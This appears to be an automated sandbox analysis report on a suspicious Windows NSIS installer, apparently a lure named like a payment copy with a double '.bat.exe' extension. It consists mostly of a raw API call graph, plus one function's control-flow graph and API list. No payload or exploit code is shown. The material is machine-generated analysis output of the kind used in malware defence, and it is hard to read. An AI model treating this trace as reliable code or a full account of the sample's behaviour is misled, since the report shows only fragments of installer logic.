4189 405c61 2 API calls 4188->4189 4190 40330b 4189->4190 4190->4103 4334 405c32 GetFileAttributesA CreateFileA 4191->4334 4193 402ddb 4220 402de8 4193->4220 4335 406099 lstrcpynA 4193->4335 4195 402dfe 4336 405a78 lstrlenA 4195->4336 4199 402e0f GetFileSize 4200 402f10 4199->4200 4201 402e26 4199->4201 4341 402cf9 4200->4341 4201->4200 4206 402fab 4201->4206 4212 402cf9 32 API calls 4201->4212 4201->4220 4372 4032af 4201->4372 4205 402f53 GlobalAlloc 4208 402f6a 4205->4208 4209 402cf9 32 API calls 4206->4209 4213 405c61 2 API calls 4208->4213 4209->4220 4210 402f34 4211 4032af ReadFile 4210->4211 4215 402f3f 4211->4215 4212->4201 4214 402f7b CreateFileA 4213->4214 4216 402fb5 4214->4216 4214->4220 4215->4205 4215->4220 4356 4032c5 SetFilePointer 4216->4356 4218 402fc3 4357 40303e 4218->4357 4220->4110 4220->4220 4222 406431 5 API calls 4221->4222 4223 4038fd 4222->4223 4224 403903 GetUserDefaultUILanguage 4223->4224 4225 403915 4223->4225 4417 405ff7 wsprintfA 4224->4417 4227 405f80 3 API calls 4225->4227 4229 403940 4227->4229 4228 403913 4418 403bae 4228->4418 4230 40395e lstrcatA 4229->4230 4231 405f80 3 API calls 4229->4231 4230->4228 4231->4230 4234 405b1f 18 API calls 4235 403990 4234->4235 4236 403a19 4235->4236 4239 405f80 3 API calls 4235->4239 4237 405b1f 18 API calls 4236->4237 4238 403a1f 4237->4238 4241 403a2f LoadImageA 4238->4241 4242 4060bb 17 API calls 4238->4242 4240 4039bc 4239->4240 4240->4236 4245 4039d8 lstrlenA 4240->4245 4249 405a5c CharNextA 4240->4249 4243 403ad5 4241->4243 4244 403a56 RegisterClassA 4241->4244 4242->4241 4248 40140b 2 API calls 4243->4248 4246 403adf 4244->4246 4247 403a8c SystemParametersInfoA CreateWindowExA 4244->4247 4250 4039e6 lstrcmpiA 4245->4250 4251 403a0c 4245->4251 4246->4113 4247->4243 4252 403adb 4248->4252 4253 4039d6 4249->4253 4250->4251 4254 4039f6 GetFileAttributesA 4250->4254 4255 405a31 3 API calls 4251->4255 4252->4246 4257 403bae 18 API calls 4252->4257 4253->4245 4256 403a02 4254->4256 4258 403a12 4255->4258 4256->4251 4259 405a78 2 API calls 4256->4259 4260 403aec 4257->4260 4426 406099 lstrcpynA 4258->4426 4259->4251 4262 403af8 ShowWindow 4260->4262 4263 403b7b 4260->4263 4265 4063c3 3 API calls 4262->4265 4427 405292 OleInitialize 4263->4427 4266 403b10 4265->4266 4268 403b1e GetClassInfoA 4266->4268 4271 4063c3 3 API calls 4266->4271 4267 403b81 4269 403b85 4267->4269 4270 403b9d 4267->4270 4273 403b32 GetClassInfoA RegisterClassA 4268->4273 4274 403b48 DialogBoxParamA 4268->4274 4269->4246 4276 40140b 2 API calls 4269->4276 4272 40140b 2 API calls 4270->4272 4271->4268 4272->4246 4273->4274 4275 40140b 2 API calls 4274->4275 4277 403b70 4275->4277 4276->4246 4277->4246 4278->4101 4445 406099 lstrcpynA 4279->4445 4281 405b30 4446 405aca CharNextA CharNextA 4281->4446 4284 4035fb 4284->4113 4293 406099 lstrcpynA 4284->4293 4285 406303 5 API calls 4288 405b46 4285->4288 4286 405b71 lstrlenA 4287 405b7c 4286->4287 4286->4288 4290 405a31 3 API calls 4287->4290 4288->4284 4288->4286 4292 405a78 2 API calls 4288->4292 4452 40639c FindFirstFileA 4288->4452 4291 405b81 GetFileAttributesA 4290->4291 4291->4284 4292->4286 4293->4147 4294->4116 4296 403812 4295->4296 4297 403808 CloseHandle 4295->4297 4298 403826 4296->4298 4299 40381c CloseHandle 4296->4299 4297->4296 4455 403854 4298->4455 4299->4298 4305 4057ca 4304->4305 4306 40364d ExitProcess 4305->4306 4307 4057de MessageBoxIndirectA 4305->4307 4307->4306 4309 406431 5 API calls 4308->4309 4310 40365a lstrcatA 4309->4310 4310->4142 4310->4143 4312 40369c 4311->4312 4313 4056d7 GetLastError 4311->4313 4312->4155 4313->4312 4314 4056e6 SetFileSecurityA 4313->4314 4314->4312 4315 4056fc GetLastError 4314->4315 4315->4312 4317 405717 GetLastError 4316->4317 4318 405713 4316->4318 4317->4318 4318->4155 4319->4157 4320->4167 4322 405e8c 4321->4322 4324 405e99 4321->4324 4512 405d08 4322->4512 4324->4167 4326 405777 4325->4326 4327 40576b CloseHandle 4325->4327 4326->4167 4327->4326 4329 401389 2 API calls 4328->4329 4330 401420 4329->4330 4330->4128 4332 4032fa 4331->4332 4333 405a4b lstrcatA 4331->4333 4332->4187 4333->4332 4334->4193 4335->4195 4337 405a85 4336->4337 4338 402e04 4337->4338 4339 405a8a CharPrevA 4337->4339 4340 406099 lstrcpynA 4338->4340 4339->4337 4339->4338 4340->4199 4342 402d07 4341->4342 4343 402d1f 4341->4343 4346 402d10 DestroyWindow 4342->4346 4347 402d17 4342->4347 4344 402d27 4343->4344 4345 402d2f GetTickCount 4343->4345 4376 40646d 4344->4376 4345->4347 4349 402d3d 4345->4349 4346->4347 4347->4205 4347->4220 4375 4032c5 SetFilePointer 4347->4375 4350 402d72 CreateDialogParamA ShowWindow 4349->4350 4351 402d45 4349->4351 4350->4347 4351->4347 4380 402cdd 4351->4380 4353 402d53 wsprintfA 4383 4051c0 4353->4383 4356->4218 4358 403069 4357->4358 4359 40304d SetFilePointer 4357->4359 4394 403146 GetTickCount 4358->4394 4359->4358 4362 405caa ReadFile 4363 403089 4362->4363 4364 403146 42 API calls 4363->4364 4366 403106 4363->4366 4365 4030a0 4364->4365 4365->4366 4367 40310c ReadFile 4365->4367 4369 4030af 4365->4369 4366->4220 4367->4366 4369->4366 4370 405caa ReadFile 4369->4370 4407 405cd9 WriteFile 4369->4407 4370->4369 4373 405caa ReadFile 4372->4373 4374 4032c2 4373->4374 4374->4201 4375->4210 4377 40648a PeekMessageA 4376->4377 4378 406480 DispatchMessageA 4377->4378 4379 40649a 4377->4379 4378->4377 4379->4347 4381 402cec 4380->4381 4382 402cee MulDiv 4380->4382 4381->4382 4382->4353 4384 402d70 4383->4384 4385 4051db 4383->4385 4384->4347 4386 4051f8 lstrlenA 4385->4386 4387 4060bb 17 API calls 4385->4387 4388 405221 4386->4388 4389 405206 lstrlenA 4386->4389 4387->4386 4391 405234 4388->4391 4392 405227 SetWindowTextA 4388->4392 4389->4384 4390 405218 lstrcatA 4389->4390 4390->4388 4391->4384 4393 40523a SendMessageA SendMessageA SendMessageA 4391->4393 4392->4391 4393->4384 4395 403174 4394->4395 4396 40329e 4394->4396 4409 4032c5 SetFilePointer 4395->4409 4397 402cf9 32 API calls 4396->4397 4403 403070 4397->4403 4399 40317f SetFilePointer 4404 4031a4 4399->4404 4400 4032af ReadFile 4400->4404 4402 402cf9 32 API calls 4402->4404 4403->4362 4403->4366 4404->4400 4404->4402 4404->4403 4405 405cd9 WriteFile 4404->4405 4406 40327f SetFilePointer 4404->4406 4410 406576 4404->4410 4405->4404 4406->4396 4408 405cf7 4407->4408 4408->4369 4409->4399 4411 40659b 4410->4411 4416 4065a3 4410->4416 4411->4404 4412 406633 GlobalAlloc 4412->4411 4412->4416 4413 40662a GlobalFree 4413->4412 4414 4066a1 GlobalFree 4415 4066aa GlobalAlloc 4414->4415 4415->4411 4415->4416 4416->4411 4416->4412 4416->4413 4416->4414 4416->4415 4417->4228 4419 403bc2 4418->4419 4434 405ff7 wsprintfA 4419->4434 4421 403c33 4435 403c67 4421->4435 4423 40396e 4423->4234 4424 403c38 4424->4423 4425 4060bb 17 API calls 4424->4425 4425->4424 4426->4236 4438 4041a6 4427->4438 4429 4052dc 4430 4041a6 SendMessageA 4429->4430 4431 4052ee OleUninitialize 4430->4431 4431->4267 4432 4052b5 4432->4429 4441 401389 4432->4441 4434->4421 4436 4060bb 17 API calls 4435->4436 4437 403c75 SetWindowTextA 4436->4437 4437->4424 4439 4041be 4438->4439 4440 4041af SendMessageA 4438->4440 4439->4432 4440->4439 4443 401390 4441->4443 4442 4013fe 4442->4432 4443->4442 4444 4013cb MulDiv SendMessageA 4443->4444 4444->4443 4445->4281 4447 405ae5 4446->4447 4449 405af5 4446->4449 4448 405af0 CharNextA 4447->4448 4447->4449 4451 405b15 4448->4451 4450 405a5c CharNextA 4449->4450 4449->4451 4450->4449 4451->4284 4451->4285 4453 4063b2 FindClose 4452->4453 4454 4063bd 4452->4454 4453->4454 4454->4288 4456 403862 4455->4456 4457 40382b 4456->4457 4458 403867 FreeLibrary GlobalFree 4456->4458 4459 405861 4457->4459 4458->4457 4458->4458 4460 405b1f 18 API calls 4459->4460 4461 405881 4460->4461 4462 4058a0 4461->4462 4463 405889 DeleteFileA 4461->4463 4465 4059d8 4462->4465 4499 406099 lstrcpynA 4462->4499 4464 40362e OleUninitialize 4463->4464 4464->4124 4464->4125 4465->4464 4472 40639c 2 API calls 4465->4472 4467 4058c6 4468 4058d9 4467->4468 4469 4058cc lstrcatA 4467->4469 4471 405a78 2 API calls 4468->4471 4470 4058df 4469->4470 4474 4058ed lstrcatA 4470->4474 4476 4058f8 lstrlenA FindFirstFileA 4470->4476 4471->4470 4473 4059f2 4472->4473 4473->4464 4475 4059f6 4473->4475 4474->4476 4477 405a31 3 API calls 4475->4477 4478 4059ce 4476->4478 4483 40591c 4476->4483 4479 4059fc 4477->4479 4478->4465 4481 405819 5 API calls 4479->4481 4480 405a5c CharNextA 4480->4483 4482 405a08 4481->4482 4484 405a22 4482->4484 4485 405a0c 4482->4485 4483->4480 4486 4059ad FindNextFileA 4483->4486 4494 405861 60 API calls 4483->4494 4496 4051c0 24 API calls 4483->4496 4497 4051c0 24 API calls 4483->4497 4498 405e78 36 API calls 4483->4498 4500 406099 lstrcpynA 4483->4500 4501 405819 4483->4501 4488 4051c0 24 API calls 4484->4488 4485->4464 4490 4051c0 24 API calls 4485->4490 4486->4483 4489 4059c5 FindClose 4486->4489 4488->4464 4489->4478 4491 405a19 4490->4491 4492 405e78 36 API calls 4491->4492 4495 405a20 4492->4495 4494->4483 4495->4464 4496->4486 4497->4483 4498->4483 4499->4467 4500->4483 4509 405c0d GetFileAttributesA 4501->4509 4504 405846 4504->4483 4505 405834 RemoveDirectoryA 4507 405842 4505->4507 4506 40583c DeleteFileA 4506->4507 4507->4504 4508 405852 SetFileAttributesA 4507->4508 4508->4504 4510 405825 4509->4510 4511 405c1f SetFileAttributesA 4509->4511 4510->4504 4510->4505 4510->4506 4511->4510 4513 405d54 GetShortPathNameA 4512->4513 4514 405d2e 4512->4514 4515 405e73 4513->4515 4516 405d69 4513->4516 4539 405c32 GetFileAttributesA CreateFileA 4514->4539 4515->4324 4516->4515 4519 405d71 wsprintfA 4516->4519 4518 405d38 CloseHandle GetShortPathNameA 4518->4515 4520 405d4c 4518->4520 4521 4060bb 17 API calls 4519->4521 4520->4513 4520->4515 4522 405d99 4521->4522 4540 405c32 GetFileAttributesA CreateFileA 4522->4540 4524 405da6 4524->4515 4525 405db5 GetFileSize GlobalAlloc 4524->4525 4526 405dd7 4525->4526 4527 405e6c CloseHandle 4525->4527 4528 405caa ReadFile 4526->4528 4527->4515 4529 405ddf 4528->4529 4529->4527 4541 405b97 lstrlenA 4529->4541 4532 405df6 lstrcpyA 4535 405e18 4532->4535 4533 405e0a 4534 405b97 4 API calls 4533->4534 4534->4535 4536 405e4f SetFilePointer 4535->4536 4537 405cd9 WriteFile 4536->4537 4538 405e65 GlobalFree 4537->4538 4538->4527 4539->4518 4540->4524 4542 405bd8 lstrlenA 4541->4542 4543 405be0 4542->4543 4544 405bb1 lstrcmpiA 4542->4544 4543->4532 4543->4533 4544->4543 4545 405bcf CharNextA 4544->4545 4545->4542 5460 401490 5461 4051c0 24 API calls 5460->5461 5462 401497 5461->5462 5463 401d95 GetDC 5464 402a9f 17 API calls 5463->5464 5465 401da7 GetDeviceCaps MulDiv ReleaseDC 5464->5465 5466 402a9f 17 API calls 5465->5466 5467 401dd8 5466->5467 5468 4060bb 17 API calls 5467->5468 5469 401e15 CreateFontIndirectA 5468->5469 5470 402577 5469->5470 5471 10001058 5473 10001074 5471->5473 5472 100010dc 5473->5472 5474 100014bb GlobalFree 5473->5474 5475 10001091 5473->5475 5474->5475 5476 100014bb GlobalFree 5475->5476 5477 100010a1 5476->5477 5478 100010b1 5477->5478 5479 100010a8 GlobalSize 5477->5479 5480 100010b5 GlobalAlloc 5478->5480 5482 100010c6 5478->5482 5479->5478 5481 100014e2 3 API calls 5480->5481 5481->5482 5483 100010d1 GlobalFree 5482->5483 5483->5472 5491 401d1a 5492 402a9f 17 API calls 5491->5492 5493 401d28 SetWindowLongA 5492->5493 5494 402951 5493->5494 5495 40491b 5496 404947 5495->5496 5497 40492b 5495->5497 5499 40497a 5496->5499 5500 40494d SHGetPathFromIDListA 5496->5500 5506 405799 GetDlgItemTextA 5497->5506 5501 404964 SendMessageA 5500->5501 5502 40495d 5500->5502 5501->5499 5504 40140b 2 API calls 5502->5504 5503 404938 SendMessageA 5503->5496 5504->5501 5506->5503 4836 40159d 4837 402ac1 17 API calls 4836->4837 4838 4015a4 SetFileAttributesA 4837->4838 4839 4015b6 4838->4839 5512 40149d 5513 4022e1 5512->5513 5514 4014ab PostQuitMessage 5512->5514 5514->5513 5515 401a1e 5516 402ac1 17 API calls 5515->5516 5517 401a27 ExpandEnvironmentStringsA 5516->5517 5518 401a3b 5517->5518 5520 401a4e 5517->5520 5519 401a40 lstrcmpA 5518->5519 5518->5520 5519->5520 5521 40171f 5522 402ac1 17 API calls 5521->5522 5523 401726 SearchPathA 5522->5523 5524 401741 5523->5524 5525 100010e0 5528 1000110e 5525->5528 5526 100011c4 GlobalFree 5527 100012ad 2 API calls 5527->5528 5528->5526 5528->5527 5529 100011c3 5528->5529 5530 100011ea GlobalFree 5528->5530 5531 10001266 2 API calls 5528->5531 5532 10001155 GlobalAlloc 5528->5532 5533 100012d1 lstrcpyA 5528->5533 5534 100011b1 GlobalFree 5528->5534 5529->5526 5530->5528 5531->5534 5532->5528 5533->5528 5534->5528 5535 10002162 5536 100021c0 5535->5536 5537 100021f6 5535->5537 5536->5537 5538 100021d2 GlobalAlloc 5536->5538 5538->5536 5539 4042a3 5540 4042b9 5539->5540 5544 4043c5 5539->5544 5542 40415a 18 API calls 5540->5542 5541 404434 5543 40443e GetDlgItem 5541->5543 5546 4044fe 5541->5546 5545 40430f 5542->5545 5547 404454 5543->5547 5548 4044bc 5543->5548 5544->5541 5544->5546 5549 404409 GetDlgItem SendMessageA 5544->5549 5550 40415a 18 API calls 5545->5550 5551 4041c1 8 API calls 5546->5551 5547->5548 5553 40447a SendMessageA LoadCursorA SetCursor 5547->5553 5548->5546 5554 4044ce 5548->5554 5572 40417c EnableWindow 5549->5572 5556 40431c CheckDlgButton 5550->5556 5552 4044f9 5551->5552 5573 404547 5553->5573 5558 4044d4 SendMessageA 5554->5558 5559 4044e5 5554->5559 5570 40417c EnableWindow 5556->5570 5558->5559 5559->5552 5564 4044eb SendMessageA 5559->5564 5560 40442f 5565 404523 SendMessageA 5560->5565 5562 40433a GetDlgItem 5571 40418f SendMessageA 5562->5571 5564->5552 5565->5541 5567 404350 SendMessageA 5568 404377 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5567->5568 5569 40436e GetSysColor 5567->5569 5568->5552 5569->5568 5570->5562 5571->5567 5572->5560 5576 40577b ShellExecuteExA 5573->5576 5575 4044ad LoadCursorA SetCursor 5575->5548 5576->5575 5577 401e25 5578 402a9f 17 API calls 5577->5578 5579 401e2b 5578->5579 5580 402a9f 17 API calls 5579->5580 5581 401e37 5580->5581 5582 401e43 ShowWindow 5581->5582 5583 401e4e EnableWindow 5581->5583 5584 402951 5582->5584 5583->5584 5585 406725 5586 4065a9 5585->5586 5587 406f14 5586->5587 5588 406633 GlobalAlloc 5586->5588 5589 40662a GlobalFree 5586->5589 5590 4066a1 GlobalFree 5586->5590 5591 4066aa GlobalAlloc 5586->5591 5588->5586 5588->5587 5589->5588 5590->5591 5591->5586 5591->5587 5592 4064a6 WaitForSingleObject 5593 4064c0 5592->5593 5594 4064d2 GetExitCodeProcess 5593->5594 5595 40646d 2 API calls 5593->5595 5596 4064c7 WaitForSingleObject 5595->5596 5596->5593 5597 4038a7 5598 4038b2 5597->5598 5599 4038b9 GlobalAlloc 5598->5599 5600 4038b6 5598->5600 5599->5600 5601 401f2b 5602 402ac1 17 API calls 5601->5602 5603 401f32 5602->5603 5604 40639c 2 API calls 5603->5604 5605 401f38 5604->5605 5607 401f4a 5605->5607 5608 405ff7 wsprintfA 5605->5608 5608->5607 5609 40292c SendMessageA 5610 402951 5609->5610 5611 402946 InvalidateRect 5609->5611 5611->5610 5619 405134 5620 405144 5619->5620 5621 405158 5619->5621 5622 4051a1 5620->5622 5623 40514a 5620->5623 5624 405160 IsWindowVisible 5621->5624 5630 405177 5621->5630 5625 4051a6 CallWindowProcA 5622->5625 5626 4041a6 SendMessageA 5623->5626 5624->5622 5627 40516d 5624->5627 5628 405154 5625->5628 5626->5628 5632 404a8b SendMessageA 5627->5632 5630->5625 5637 404b0b 5630->5637 5633 404aea SendMessageA 5632->5633 5634 404aae GetMessagePos ScreenToClient SendMessageA 5632->5634 5635 404ae2 5633->5635 5634->5635 5636 404ae7 5634->5636 5635->5630 5636->5633 5646 406099 lstrcpynA 5637->5646 5639 404b1e 5647 405ff7 wsprintfA 5639->5647 5641 404b28 5642 40140b 2 API calls 5641->5642 5643 404b31 5642->5643 5648 406099 lstrcpynA 5643->5648 5645 404b38 5645->5622 5646->5639 5647->5641 5648->5645 5649 4026b4 5650 4026ba 5649->5650 5651 402951 5650->5651 5652 4026c2 FindClose 5650->5652 5652->5651 5653 402736 5654 402ac1 17 API calls 5653->5654 5655 402744 5654->5655 5656 40275a 5655->5656 5657 402ac1 17 API calls 5655->5657 5658 405c0d 2 API calls 5656->5658 5657->5656 5659 402760 5658->5659 5681 405c32 GetFileAttributesA CreateFileA 5659->5681 5661 40276d 5662 402816 5661->5662 5663 402779 GlobalAlloc 5661->5663 5664 402831 5662->5664 5665 40281e DeleteFileA 5662->5665 5666 402792 5663->5666 5667 40280d CloseHandle 5663->5667 5665->5664 5682 4032c5 SetFilePointer 5666->5682 5667->5662 5669 402798 5670 4032af ReadFile 5669->5670 5671 4027a1 GlobalAlloc 5670->5671 5672 4027b1 5671->5672 5673 4027eb 5671->5673 5674 40303e 44 API calls 5672->5674 5675 405cd9 WriteFile 5673->5675 5680 4027be 5674->5680 5676 4027f7 GlobalFree 5675->5676 5677 40303e 44 API calls 5676->5677 5678 40280a 5677->5678 5678->5667 5679 4027e2 GlobalFree 5679->5673 5680->5679 5681->5661 5682->5669 5683 4014b7 5684 4014bd 5683->5684 5685 401389 2 API calls 5684->5685 5686 4014c5 5685->5686 5687 401b39 5688 402ac1 17 API calls 5687->5688 5689 401b40 5688->5689 5690 402a9f 17 API calls 5689->5690 5691 401b49 wsprintfA 5690->5691 5692 402951 5691->5692 4629 40233a 4630 402ac1 17 API calls 4629->4630 4631 40234b 4630->4631 4632 402ac1 17 API calls 4631->4632 4633 402354 4632->4633 4634 402ac1 17 API calls 4633->4634 4635 40235e GetPrivateProfileStringA 4634->4635 4636 4015bb 4637 402ac1 17 API calls 4636->4637 4638 4015c2 4637->4638 4639 405aca 4 API calls 4638->4639 4644 4015ca 4639->4644 4640 401624 4642 401652 4640->4642 4643 401629 4640->4643 4641 405a5c CharNextA 4641->4644 4646 401423 24 API calls 4642->4646 4655 401423 4643->4655 4644->4640 4644->4641 4648 405703 2 API calls 4644->4648 4651 405720 5 API calls 4644->4651 4653 40160c GetFileAttributesA 4644->4653 4654 405686 4 API calls 4644->4654 4649 40164a 4646->4649 4648->4644 4651->4644 4652 40163b SetCurrentDirectoryA 4652->4649 4653->4644 4654->4644 4656 4051c0 24 API calls 4655->4656 4657 401431 4656->4657 4658 406099 lstrcpynA 4657->4658 4658->4652 5693 401d3b GetDlgItem GetClientRect 5694 402ac1 17 API calls 5693->5694 5695 401d6b LoadImageA SendMessageA 5694->5695 5696 402951 5695->5696 5697 401d89 DeleteObject 5695->5697 5697->5696 5698 4016bb 5699 402ac1 17 API calls 5698->5699 5700 4016c1 GetFullPathNameA 5699->5700 5701 4016d8 5700->5701 5707 4016f9 5700->5707 5704 40639c 2 API calls 5701->5704 5701->5707 5702 402951 5703 40170d GetShortPathNameA 5703->5702 5705 4016e9 5704->5705 5705->5707 5708 406099 lstrcpynA 5705->5708 5707->5702 5707->5703 5708->5707 5709 404b3d GetDlgItem GetDlgItem 5710 404b8f 7 API calls 5709->5710 5717 404da7 5709->5717 5711 404c32 DeleteObject 5710->5711 5712 404c25 SendMessageA 5710->5712 5713 404c3b 5711->5713 5712->5711 5715 404c72 5713->5715 5716 4060bb 17 API calls 5713->5716 5714 404e8b 5719 404f37 5714->5719 5724 404d9a 5714->5724 5729 404ee4 SendMessageA 5714->5729 5718 40415a 18 API calls 5715->5718 5720 404c54 SendMessageA SendMessageA 5716->5720 5717->5714 5727 404a8b 5 API calls 5717->5727 5743 404e18 5717->5743 5723 404c86 5718->5723 5721 404f41 SendMessageA 5719->5721 5722 404f49 5719->5722 5720->5713 5721->5722 5731 404f62 5722->5731 5732 404f5b ImageList_Destroy 5722->5732 5738 404f72 5722->5738 5728 40415a 18 API calls 5723->5728 5725 4041c1 8 API calls 5724->5725 5730 40512d 5725->5730 5726 404e7d SendMessageA 5726->5714 5727->5743 5744 404c94 5728->5744 5729->5724 5734 404ef9 SendMessageA 5729->5734 5736 404f6b GlobalFree 5731->5736 5731->5738 5732->5731 5733 4050e1 5733->5724 5739 4050f3 ShowWindow GetDlgItem ShowWindow 5733->5739 5735 404f0c 5734->5735 5746 404f1d SendMessageA 5735->5746 5736->5738 5737 404d68 GetWindowLongA SetWindowLongA 5740 404d81 5737->5740 5738->5733 5753 404b0b 4 API calls 5738->5753 5755 404fad 5738->5755 5739->5724 5741 404d87 ShowWindow 5740->5741 5742 404d9f 5740->5742 5760 40418f SendMessageA 5741->5760 5761 40418f SendMessageA 5742->5761 5743->5714 5743->5726 5744->5737 5745 404ce3 SendMessageA 5744->5745 5747 404d62 5744->5747 5751 404d30 SendMessageA 5744->5751 5752 404d1f SendMessageA 5744->5752 5745->5744 5746->5719 5747->5737 5747->5740 5748 404ff1 5754 4050b7 InvalidateRect 5748->5754 5759 405065 SendMessageA SendMessageA 5748->5759 5751->5744 5752->5744 5753->5755 5754->5733 5756 4050cd 5754->5756 5755->5748 5757 404fdb SendMessageA 5755->5757 5758 404a46 20 API calls 5756->5758 5757->5748 5758->5733 5759->5748 5760->5724 5761->5717

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 0040330D Relevance: 94.9, APIs: 33, Strings: 21, Instructions: 368stringcomfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 40330d-40334c SetErrorMode GetVersion 1 40334e-403356 call 406431 0->1 2 40335f 0->2 1->2 7 403358 1->7 4 403364-403377 call 4063c3 lstrlenA 2->4 9 403379-403395 call 406431 * 3 4->9 7->2 16 4033a6-403406 #17 OleInitialize SHGetFileInfoA call 406099 GetCommandLineA call 406099 GetModuleHandleA 9->16 17 403397-40339d 9->17 24 403412-403427 call 405a5c CharNextA 16->24 25 403408-40340d 16->25 17->16 21 40339f 17->21 21->16 28 4034ec-4034f0 24->28 25->24 29 4034f6 28->29 30 40342c-40342f 28->30 33 403509-403523 GetTempPathA call 4032dc 29->33 31 403431-403435 30->31 32 403437-40343f 30->32 31->31 31->32 34 403441-403442 32->34 35 403447-40344a 32->35 43 403525-403543 GetWindowsDirectoryA lstrcatA call 4032dc 33->43 44 40357b-403595 DeleteFileA call 402d98 33->44 34->35 37 403450-403454 35->37 38 4034dc-4034e9 call 405a5c 35->38 41 403456-40345c 37->41 42 40346c-403499 37->42 38->28 52 4034eb 38->52 47 403462 41->47 48 40345e-403460 41->48 49 40349b-4034a1 42->49 50 4034ac-4034da 42->50 43->44 61 403545-403575 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032dc 43->61 58 403629-403639 call 4037f7 OleUninitialize 44->58 59 40359b-4035a1 44->59 47->42 48->42 48->47 54 4034a3-4034a5 49->54 55 4034a7 49->55 50->38 57 4034f8-403504 call 406099 50->57 52->28 54->50 54->55 55->50 57->33 72 40375d-403763 58->72 73 40363f-40364f call 4057b5 ExitProcess 58->73 62 4035a3-4035ae call 405a5c 59->62 63 403619-403620 call 4038e9 59->63 61->44 61->58 74 4035b0-4035d9 62->74 75 4035e4-4035ee 62->75 70 403625 63->70 70->58 77 403765-40377e GetCurrentProcess OpenProcessToken 72->77 78 4037df-4037e7 72->78 79 4035db-4035dd 74->79 82 4035f0-4035fd call 405b1f 75->82 83 403655-403669 call 405720 lstrcatA 75->83 85 4037b0-4037be call 406431 77->85 86 403780-4037aa LookupPrivilegeValueA AdjustTokenPrivileges 77->86 80 4037e9 78->80 81 4037ed-4037f1 ExitProcess 78->81 79->75 88 4035df-4035e2 79->88 80->81 82->58 96 4035ff-403615 call 406099 * 2 82->96 97 403676-403690 lstrcatA lstrcmpiA 83->97 98 40366b-403671 lstrcatA 83->98 94 4037c0-4037ca 85->94 95 4037cc-4037d6 ExitWindowsEx 85->95 86->85 88->75 88->79 94->95 100 4037d8-4037da call 40140b 94->100 95->78 95->100 96->63 97->58 99 403692-403695 97->99 98->97 103 403697-40369c call 405686 99->103 104 40369e call 405703 99->104 100->78 112 4036a3-4036b0 SetCurrentDirectoryA 103->112 104->112 113 4036b2-4036b8 call 406099 112->113 114 4036bd-4036e5 call 406099 112->114 113->114 118 4036eb-403707 call 4060bb DeleteFileA 114->118 121 403748-40374f 118->121 122 403709-403719 CopyFileA 118->122 121->118 124 403751-403758 call 405e78 121->124 122->121 123 40371b-40373b call 405e78 call 4060bb call 405738 122->123 123->121 133 40373d-403744 CloseHandle 123->133 124->58 133->121
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 00403332
                                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 00403338
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
                                                                                                                                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004033AE
                                                                                                                                                                                                                                      • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
                                                                                                                                                                                                                                      • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000020,?,00000006,00000008,0000000A), ref: 0040341D
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
                                                                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
                                                                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                                                                                                                                                                                                        • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                                                                                                                                                                                                        • Part of subcall function 004038E9: GetUserDefaultUILanguage.KERNELBASE(00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403903
                                                                                                                                                                                                                                        • Part of subcall function 004038E9: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410), ref: 004039D9
                                                                                                                                                                                                                                        • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
